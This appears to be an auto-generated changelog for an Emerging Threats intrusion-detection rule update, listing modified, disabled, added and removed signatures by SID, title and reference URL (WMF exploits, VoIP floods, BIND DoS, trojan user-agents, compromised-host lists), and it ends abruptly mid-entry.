Modified inactive rules: [///] 2001402 - ET POLICY ZIPPED DOC in transit (emerging-policy.rules) 2001403 - ET POLICY ZIPPED XLS in transit (emerging-policy.rules) 2001404 - ET POLICY ZIPPED EXE in transit (emerging-policy.rules) 2001405 - ET POLICY ZIPPED PPT in transit (emerging-policy.rules) [---] Disabled and modified rules: [---] 2002315 - ET EXPLOIT Incoming Electronic Mail for UNIX Expires Header Buffer Overflow Exploit (emerging-exploit.rules) 2002316 - ET EXPLOIT Outgoing Electronic Mail for UNIX Expires Header Buffer Overflow Exploit (emerging-exploit.rules) 2002741 - ET EXPLOIT WMF Escape Record Exploit - Web Only - version 3 (emerging-exploit.rules) 2002742 - ET EXPLOIT WMF Escape Record Exploit - Version 3 (emerging-exploit.rules) 2002757 - ET EXPLOIT WMF Escape Record Exploit - Web Only - version 1 (emerging-exploit.rules) 2002758 - ET EXPLOIT WMF Escape Record Exploit - Version 1 (emerging-exploit.rules) [---] Disabled rules: [---] 2002734 - ET EXPLOIT WMF Exploit (emerging-exploit.rules) 2002743 - ET EXPLOIT WMF Escape Record Exploit - Web Only - all versions (emerging-exploit.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-exploit.rules (1): ## These rules have to be there for both -> Added to emerging-sid-msg.map (14): 2003192 || ET VOIP INVITE Message Flood TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003192 2003193 || ET VOIP REGISTER Message Flood TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003193 2003194 || ET VOIP Multiple Unauthorized SIP Responses TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2003194 2009685 || ET TROJAN Unkown Trojan User-Agent (5.1 ...) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Unknown || url,doc.emergingthreats.net/2009685 2009694 || ET TROJAN Navipromo related update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Navipromo || url,doc.emergingthreats.net/2009694 2009695 || ET CURRENT_EVENTS ISC BIND9 Update DoS || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009695 || url,www.isc.org/node/474 || url,downloads.securityfocus.com/vulnerabilities/exploits/35848.txt 2009696 || ET POLICY External Connection to Altiris HelpDesk || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Altiris || url,doc.emergingthreats.net/2009696 || url,www.symantec.com/business/theme.jsp?themeid=altiris 2009697 || ET POLICY External Connection to Altiris Console || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Altiris || url,doc.emergingthreats.net/2009697 || url,www.symantec.com/business/theme.jsp?themeid=altiris 2009698 || ET VOIP INVITE Message Flood UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2009698 2009699 || ET VOIP REGISTER Message Flood UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2009699 2009700 || ET VOIP Multiple Unauthorized SIP Responses UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2009700 2009701 || ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009701 || cve,2009-0696 2009702 || ET CURRENT_EVENTS POLICY DNS Update From External net || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009702 2009703 || ET MALWARE Suspicious User-Agent (INet) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/2009703 -> Added to emerging-sid-msg.map.txt (14): 2003192 || ET VOIP INVITE Message Flood TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003192 2003193 || ET VOIP REGISTER Message Flood TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003193 2003194 || ET VOIP Multiple Unauthorized SIP Responses TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2003194 2009685 || ET TROJAN Unkown Trojan User-Agent (5.1 ...) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Unknown || url,doc.emergingthreats.net/2009685 2009694 || ET TROJAN Navipromo related update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Navipromo || url,doc.emergingthreats.net/2009694 2009695 || ET CURRENT_EVENTS ISC BIND9 Update DoS || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009695 || url,www.isc.org/node/474 || url,downloads.securityfocus.com/vulnerabilities/exploits/35848.txt 2009696 || ET POLICY External Connection to Altiris HelpDesk || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Altiris || url,doc.emergingthreats.net/2009696 || url,www.symantec.com/business/theme.jsp?themeid=altiris 2009697 || ET POLICY External Connection to Altiris Console || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Altiris || url,doc.emergingthreats.net/2009697 || url,www.symantec.com/business/theme.jsp?themeid=altiris 2009698 || ET VOIP INVITE Message Flood UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2009698 2009699 || ET VOIP REGISTER Message Flood UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2009699 2009700 || ET VOIP Multiple Unauthorized SIP Responses UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2009700 2009701 || ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009701 || cve,2009-0696 2009702 || ET CURRENT_EVENTS POLICY DNS Update From External net || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009702 2009703 || ET MALWARE Suspicious User-Agent (INet) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/2009703 -> Added to emerging-virus.rules (1): #by Markus Lude -> Added to emerging.rules (3): #broken, replaced with below rule #by Daniel Sheperd #this sig JUST gets updates from external_net, not the exploit. Will go to policy later [---] Removed non-rule lines: [---] -> Removed from emerging-exploit.rules (1): # These rules have to be there for both -> Removed from emerging-sid-msg.map (304): 2003192 || ET VOIP INVITE Message Flood || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003192 2003193 || ET VOIP REGISTER Message Flood || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003193 2003194 || ET VOIP Multiple Unauthorized SIP Responses || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2003194 2009685 || ET TROJAN Unkown Trojan User-Agent (5.1 07:00 ...) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Unknown || url,doc.emergingthreats.net/2009685 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500284 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500285 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500286 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500287 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500288 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500289 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500290 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500291 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500292 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500293 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500294 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500295 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500296 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500297 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500298 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500299 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500300 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500301 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500302 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500303 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500304 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500305 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500306 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (154) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500307 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (154) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500308 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (155) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500309 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (155) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500310 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (156) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500311 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (156) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500312 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (157) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500313 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (157) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500314 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (158) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500315 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (158) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500316 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (159) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500317 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (159) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500318 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (160) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500319 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (160) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500320 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (161) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500321 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (161) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500322 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (162) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500323 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (162) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500324 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (163) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500325 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (163) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500326 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (164) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500327 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (164) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500328 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (165) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500329 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (165) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500330 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (166) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500331 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (166) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500332 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (167) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500333 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (167) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500334 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (168) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500335 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (168) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500336 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (169) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500337 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (169) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500338 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (170) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500339 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (170) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500340 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (171) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500341 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (171) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500342 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (172) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500343 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (172) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500344 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (173) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500345 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (173) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500346 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (174) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500347 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (174) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500348 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (175) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500349 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (175) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500350 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (176) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500351 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (176) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500352 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (177) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500353 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (177) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500354 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (178) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500355 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (178) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500356 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (179) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500357 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (179) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500358 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (180) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500359 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (180) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500360 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (181) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500361 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (181) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500362 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (182) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500363 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (182) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500364 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (183) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500365 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (183) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500366 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (184) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500367 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (184) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500368 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (185) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500369 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (185) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500370 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (186) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500371 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (186) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500372 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (187) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500373 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (187) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500374 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (188) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500375 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (188) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500376 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (189) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500377 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (189) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500378 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (190) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500379 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (190) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500380 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (191) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500381 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (191) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || 